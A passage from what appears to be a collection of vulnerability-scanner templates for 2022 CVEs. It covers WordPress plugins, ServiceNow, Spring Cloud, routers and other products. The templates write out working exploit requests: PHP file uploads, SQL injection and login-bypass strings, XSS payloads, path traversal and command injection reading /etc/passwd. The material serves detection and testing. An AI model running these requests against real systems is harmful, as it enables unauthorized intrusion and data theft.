boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-0968","info":{"name":"Microweber <1.2.12 - Integer Overflow","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1\nHost: {{Hostname}}\n","POST /api/user/2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nthumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,'\\\"first_name\\\":\\\"{{payload}}\\\"')","status_code_3==200","contains(header_3,\"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"token\" value=\"(.*)\" autocomplete=\"off\">"],"internal":true,"part":"body"},{"type":"regex","name":"user","group":1,"regex":["<input type=\"text\" class=\"form-control\" name=\"username\" value=\"(.*)\">"],"internal":true,"part":"body"},{"type":"regex","name":"email","group":1,"regex":["<input type=\"email\" class=\"form-control\" name=\"email\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-39048","info":{"name":"ServiceNow - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /navpage.do HTTP/1.1\nHost: {{Hostname}}\n","POST /login.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}&not_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do\n","GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["unwrapped_url = \"javascript:alert(document.domain)//assessment_take2.do\"","assessment_list.do"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name=\"sysparm_ck\" id=\"sysparm_ck\" type=\"hidden\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-38463","info":{"name":"ServiceNow - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["top.location.href = 'javascript:alert(document.domain)';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26233","info":{"name":"Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2022-36553","info":{"name":"Hytec Inter HWL-2511-SS - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"command":["cat%20/etc/passwd","type%20C://Windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(body_1, '<title>index</title>')","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200","contains(body_1, '<title>index</title>')"],"condition":"and"}]}]},{"id":"CVE-2022-47615","info":{"name":"LearnPress Plugin < 4.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["\"status\":","\"pagination\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0533","info":{"name":"Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains_all(body_2, \"<img src onerror=alert(document.domain)>\", \"ditty\")"],"condition":"and"}]}]},{"id":"CVE-2022-22897","info":{"name":"PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /modules/appagebuilder/config.xml HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI\n"],"matchers-condition":"or","matchers":[{"type":"dsl","name":"time-based","dsl":["duration_2>=6","status_code_1 == 200 && compare_versions(version, \"<= 2.4.4\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["status_code_1 == 200 && compare_versions(version, \"<= 2.4.4\")","contains(body_3, \"content\") && contains(body_3, \"{{Hostname}}\")","!contains(body_4, \"content\") && !contains(body_4, \"{{Hostname}}\")","len(body_3) > 200 && len(body_4) <= 22"],"condition":"and"}],"extractors":[{"type":"regex","name":"version","part":"body_1","internal":true,"group":1,"regex":["<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"]}]}]},{"id":"CVE-2022-44952","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\nTest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\ntest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\nenglish.php\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\nAmerica/New_York\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n10\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\nm/d/Y\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\nm/d/Y H:i\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n2/./*\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n","@timeout: 5s\nGET /index.php?module=dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"<script>alert(document.domain)</script>\")","contains(body_4, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29007","info":{"name":"Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /dfsms/add-category.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Add Product</title>","<span>Admin","DFSMS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1574","info":{"name":"WordPress HTML2WP <=1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 253\nContent-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990\nConnection: close\n\n-----------------------------7816508136577551742878603990\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"{{randstr}}.php\"\nContent-Type: text/html\n\n<?php\n\necho \"File Upload success\";\n\n-----------------------------7816508136577551742878603990--\n","GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 200","contains(body_2, 'File Upload success')"],"condition":"and"}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2633","info":{"name":"All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45037","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["<script>alert(document.domain)</script>","SESSION_TIMEOUT"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"username_fieldname_2","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-29301","info":{"name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","SolarView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29013","info":{"name":"Razer Sila Gaming Router - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ubus/"],"headers":{"Origin":"{{RootURL}}","Referer":"{{ROotURL}}","X-Requested-With":"XMLHttpRequest"},"body":"{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"30ebdc7dd1f519beb4b2175e9dd8463e\",\"file\",\"exec\",{\"command\":\"id\"}]}\n","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1580","info":{"name":"Site Offline WP Plugin < 1.5.3 - Authorization Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"],"matchers":[{"type":"word","internal":true,"words":["Site Offline Or Coming Soon Or Maintenance Mode"]}]},{"method":"GET","path":["{{BaseURL}}/?admin"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"wp-block\", \"author\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-4059","info":{"name":"Cryptocurrency Widgets Pack < 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=7","len(body_1) == 0","status_code_1 == 302","contains(body_2, \"Cryptocurrency Widgets Pack\")"],"condition":"and"}]}]},{"id":"CVE-2022-0870","info":{"name":"Gogs <0.12.5 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/migrate HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-3934","info":{"name":"WordPress FlatPM <3.0.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")"],"condition":"and"}]}]},{"id":"CVE-2022-0827","info":{"name":"WordPress Best Books <=2.6.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"Account added successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script> - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<svg/onload=\"alert(document.domain)\"/>","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2462","info":{"name":"WordPress Transposh <=1.0.8.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=tp_history&token=&lang=en","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(transposh) > 0"]},{"type":"word","part":"body","words":["translated","translated_by","timestamp","source","user_login"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24124","info":{"name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error.*&#39","casdoor"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32026","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\"><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"><script>alert(document.domain)</script>","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32094","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/doctor/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Doctor  | Dashboard</title>","View Appointment History"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23102","info":{"name":"SINEMA Remote Connect Server < V2.0 - Open 